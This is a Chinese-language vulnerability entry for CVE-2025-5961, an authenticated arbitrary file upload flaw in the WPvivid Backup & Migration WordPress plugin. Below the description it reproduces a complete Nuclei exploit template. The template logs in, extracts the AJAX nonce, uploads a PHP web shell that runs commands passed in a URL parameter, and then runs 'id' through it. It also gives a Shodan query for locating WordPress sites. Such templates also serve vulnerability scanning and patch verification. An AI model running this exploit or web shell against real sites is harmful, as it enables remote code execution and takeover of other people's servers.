WordPress WPvivid Backup & Migration Plugin Arbitrary File Upload Vulnerability

漏洞信息

漏洞名称： WordPress WPvivid Backup & Migration Plugin Arbitrary File Upload Vulnerability

漏洞编号：

• CVE： CVE-2025-5961

漏洞类型： 文件上传

漏洞等级： 高危

漏洞描述： WordPress的WPvivid备份与迁移插件（版本<=0.9.116）存在一个认证后的任意文件上传漏洞。该漏洞源于插件在处理文件上传时，未对文件类型进行充分验证，特别是在’wpvivid_upload_import_files’函数中。攻击者可以利用这一漏洞上传任意文件，包括PHP文件，进而可能导致远程代码执行、系统完全被控制以及敏感数据未授权访问。该漏洞的CVSS评分为8.8，属于高危漏洞。影响范围广泛，因为WordPress是一个广泛使用的内容管理系统，而WPvivid备份与迁移插件是其用户常用的插件之一。为了防范此漏洞，建议用户更新插件至修复版本或移除插件。

产品厂商： wpvivid

产品名称： Migration, Backup, Staging – WPvivid Backup & Migration plugin for WordPress

影响版本： <= 0.9.116

搜索语法： http.component:”wordpress”

来源： https://github.com/projectdiscovery/nuclei-templates/blob/59223adba0791254b5914f95c49a72ca5cfe26e3/http%2Fcves%2F2025%2FCVE-2025-5961.yaml

类型： projectdiscovery/nuclei-templates:github issues

POC详情

id: CVE-2025-5961

info:
  name: WordPress WPvivid Backup & Migration Plugin <= 0.9.116 - Authenticated Arbitrary File Upload
  author: pussycat0x
  severity: high
  description: |
    The Migration, Backup, Staging – WPvivid Backup & Migration plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'wpvivid_upload_import_files' function in all versions up to, and including, 0.9.116.
  impact: |
    An authenticated attacker can upload arbitrary files, including PHP files, which can lead to remote code execution, complete system compromise, and unauthorized access to sensitive data.
  remediation: |
    Update the WPvivid Backup & Migration plugin to a version that addresses this vulnerability or remove the plugin if no fix is available.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2025-5961
    cwe-id: CWE-434
  metadata:
    max-request: 4
    vendor: wpvivid
    product: migration-backup-staging
    framework: wordpress
    shodan-query: http.component:"wordpress"
  reference:
    - https://github.com/Nxploited/CVE-2025-5961
  tags: cve,cve2025,wordpress,intrusive,wpvivid,plugin,authenticated,file-upload,backup

variables:
  payload: '<?php echo "<br>"; if(isset($_GET["cmd"])){ echo "<pre>"; system($_GET["cmd"]); echo "</pre>"; } ?>'
  cmd: 'id'

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

      - |
        GET /wp-admin/admin.php?page=wpvivid-export-import HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate, br
        Accept: */*
        Connection: keep-alive
        Content-Length: 598
        Content-Type: multipart/form-data; boundary=0b9e4b9be0f532af74af1582b95632f2

        --0b9e4b9be0f532af74af1582b95632f2
        Content-Disposition: form-data; name="action"

        wpvivid_upload_import_files
        --0b9e4b9be0f532af74af1582b95632f2
        Content-Disposition: form-data; name="_ajax_nonce"

        {{ajax_nonce}}
        --0b9e4b9be0f532af74af1582b95632f2
        Content-Disposition: form-data; name="async-upload"; filename="{{randstr}}.php"
        Content-Type: application/x-php

        {{payload}}
        --0b9e4b9be0f532af74af1582b95632f2
        Content-Disposition: form-data; name="name"

        {{randstr}}.php
        --0b9e4b9be0f532af74af1582b95632f2--

      - |
        GET wp-content/wpvividbackups/ImportandExport/{{randstr}}.php?cmd={{cmd}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{"result":"success"}'

      - type: regex
        part: body
        regex:
          - 'uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)'

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body_2
        group: 1
        internal: true
        name: ajax_nonce
        regex:
          - '"ajax_nonce":"([a-f0-9]+)"'